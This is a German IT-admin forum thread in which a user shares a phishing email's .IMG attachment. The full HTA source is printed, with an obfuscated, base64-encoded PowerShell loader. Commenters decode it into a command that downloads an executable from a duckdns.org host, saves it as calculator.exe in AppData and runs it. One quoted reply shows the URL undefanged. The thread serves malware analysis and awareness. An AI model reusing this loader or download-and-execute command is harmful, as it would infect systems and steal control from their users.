Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)
Moin Moin an alle
Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).
Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..
Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)
In der IMG war eine .HTA Datei mit folgendem Inhalt
Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.
Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.
Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).
Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..
Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)
In der IMG war eine .HTA Datei mit folgendem Inhalt
<html> <HTA:APPLICATION /> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="x-ua-compatible" content="ie=9"> <title>Load HTA</title>
<script type="text/javascript"> new ActiveXObject("wsCript.SHell").rUn( '"POWERSHell.EXe" pOWeRSHelL.EXe -Ex bYPASs -NoP -w 1 -eC
CQAJACAAIAAJACAACQAJACAACQAgACAAIAAJAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBFAHEAdQBFAFMAVAAgAAkACQAgACAAIAAgACAACQAJACAAIAAJACAAIAAJAAkAIAAgACAAIAAgAAkAIAAJACAAIAAJACAACQAgACAALQBVAFIAaQAJAAkACQAJAAkACQAJAAkACQAJACAAHSBoAHQAdABwADoALwAvAGwAaQBuAGsAZAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvADEAMQBkAC8AZAB5AG4AbwAuAGUAeABlAB0gCQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAtAG8AdQBUAGYAaQBsAEUAIAAJAAkACQAJAAkACQAJAAkACQAdICQARQBOAFYAOgBBAHAAUABEAEEAVABBAFwAYwBhAGwAYwB1AGwAYQB0AG8AcgAuAGUAeABlAB0gIAAJACAACQAJAAkACQAJAAkACQAgACAACQAgACAAIAAgAAkACQAgAAkAIAAJACAAIAAgACAAIAAgAAkACQAJAAkAIAAgACAAOwAgACAAIAAgACAACQBpAE4AVgBvAGsAZQAtAEUAeABQAFIARQBzAFMAaQBvAE4ACQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkAHSAkAGUAbgB2ADoAQQBwAHAARABBAHQAYQBcAGMAYQBsAGMAdQBsAGEAdABvAHIALgBlAHgAZQAdIA== ' , 0 ) ;
</script> </head> <body> <div><a href="javascript:void(0)" onclick="();return false">
<!DOCTYPE HTML> <html> </html></a></div> </body> </html>
Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.
Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 1078421591
Url: https://administrator.de/contentid/1078421591
Ausgedruckt am: 21.11.2024 um 21:11 Uhr
17 Kommentare
Neuester Kommentar
Moin,
Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $env:AppDAta\calculator.exe
Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.
lks
PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.
PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.
P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden.
P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.
P5S:decode base64
Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.
Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $env:AppDAta\calculator.exe
Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.
lks
PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.
PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.
P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden.
P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.
P5S:decode base64
Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.
Zitat von @Fennek11:
Es ist Base64:
invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”
Fehlt da noch etwas?
Es ist Base64:
invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”
Fehlt da noch etwas?
invoke-expression $env:AppDAta\calculator.exe
lks
Edit: parameter von invoke-Expression ergänzt.
Zitat von @wolfble:
Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...
Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...
Mit dem Tool base64 das so ziemlich mit jeder Distribution dabei ist und auch unter Linux mit WSL oder cygwin zur verfügung steht.
Mit den online-Tools aus der google-Suche oben geht das natürlich auch. Man muß nur die Sonderzeichen geschickt interpretieren, die da zwischendrin stehen.
lks
Übrigens:
Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.
TGIF
lks
PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.
Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.
TGIF
lks
PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.
Es gibt doch Powershell auf dem MAC
Installieren von PowerShell unter macOS
lks
PS: Für pöhses unter MacOS reicht auch die bash (oder zsh).
@wolfble
Wenn's das denn nun war bitte nicht vergessen den Thread dann auch zu schliessen !
Wie kann ich einen Beitrag als gelöst markieren?
Wenn's das denn nun war bitte nicht vergessen den Thread dann auch zu schliessen !
Wie kann ich einen Beitrag als gelöst markieren?
Zeit auch den Thread dann langsam mal zu schliessen !
Wie kann ich einen Beitrag als gelöst markieren?
Wie kann ich einen Beitrag als gelöst markieren?